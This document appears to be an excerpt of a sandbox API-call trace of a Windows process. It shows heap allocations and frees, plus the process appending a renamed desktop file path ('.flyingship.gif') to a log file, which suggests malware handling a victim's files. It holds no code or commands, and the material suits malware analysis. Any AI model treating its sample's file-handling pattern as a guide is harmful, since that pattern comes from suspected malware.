[0075.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0075.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0075.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0075.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0075.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0075.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0075.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x60) returned 0x75b7b8 [0075.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0075.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0075.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbd0 | out: hHeap=0x650000) returned 1 [0075.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0075.886] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0075.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0075.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0075.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0075.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0075.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0075.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0075.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db58 | out: hHeap=0x650000) returned 1 [0075.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0075.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0075.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0075.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da18 | out: hHeap=0x650000) returned 1 [0075.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0075.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0075.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0075.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd10 | out: hHeap=0x650000) returned 1 [0075.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0075.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0075.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9f0 | out: hHeap=0x650000) returned 1 [0075.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0075.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0075.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xf0) returned 0x6b9e98 [0075.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x75b7b8 | out: hHeap=0x650000) returned 1 [0075.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0075.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0075.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0075.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1b20 [0075.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0075.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0075.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0075.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1b20 | out: hHeap=0x650000) returned 1 [0075.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0075.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0075.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b38 [0075.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x771fe8 [0075.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0075.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0075.888] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0075.888] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.888] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eedc | out: lpNewFilePointer=0x0) returned 1 [0075.888] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.888] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0075.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0075.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x781ff0 [0075.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0075.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.888] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eecc | out: lpNewFilePointer=0x0) returned 1 [0075.888] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x298, lpOverlapped=0x0) returned 1 [0075.888] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x0, lpOverlapped=0x0) returned 1 [0075.888] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x298, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.888] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0075.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x781ff0 | out: hHeap=0x650000) returned 1 [0075.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0075.889] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0075.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.flyingship.gif\r\n", cchWideChar=64, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 64 [0075.889] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0075.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.flyingship.gif\r\n", cchWideChar=64, lpMultiByteStr=0x74b588, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.flyingship.gif\r\n", lpUsedDefaultChar=0x0) returned 64 [0075.889] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0075.889] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0075.889] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0075.889] WriteFile (in: hFile=0x128, lpBuffer=0x74b5d0*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x74b5d0*, lpNumberOfBytesWritten=0x61eef4*=0x3f, lpOverlapped=0x0) returned 1 [0075.889] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.889] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.889] CloseHandle (hObject=0x128) returned 1 [0075.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0075.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0075.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b38 | out: hHeap=0x650000) returned 1 [0075.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0075.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9e98 | out: hHeap=0x650000) returned 1 [0075.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0075.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9c8 | out: hHeap=0x650000) returned 1 [0075.890] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89b8 | out: hHeap=0x650000) returned 1 [0075.890] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b540 | out: hHeap=0x650000) returned 1 [0075.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0075.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d630 | out: hHeap=0x650000) returned 1 [0075.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d068 | out: hHeap=0x650000) returned 1 [0075.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x69d730 | out: hHeap=0x650000) returned 1 [0075.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0075.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d838 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d680 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d7c0 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad78 | out: hHeap=0x650000) returned 1 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0075.891] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8978 | out: hHeap=0x650000) returned 1 [0075.892] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.892] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690740 [0075.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908d0 [0075.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0075.892] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0075.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0075.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0075.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0075.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6908d0 [0075.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0075.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad78 [0075.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0075.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0075.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0075.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0075.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e558 [0075.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d680 [0075.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0075.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0075.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0075.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0075.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b540 [0075.892] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0075.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0075.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0075.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0075.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0075.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0075.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0075.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0075.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0075.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0075.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1f8 [0075.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0075.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0075.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0075.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0075.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0075.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0075.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0075.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0075.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0075.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0075.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0075.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0075.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0075.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.894] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0075.894] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0075.894] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.894] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b420 [0075.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.894] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0075.894] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0075.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.894] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 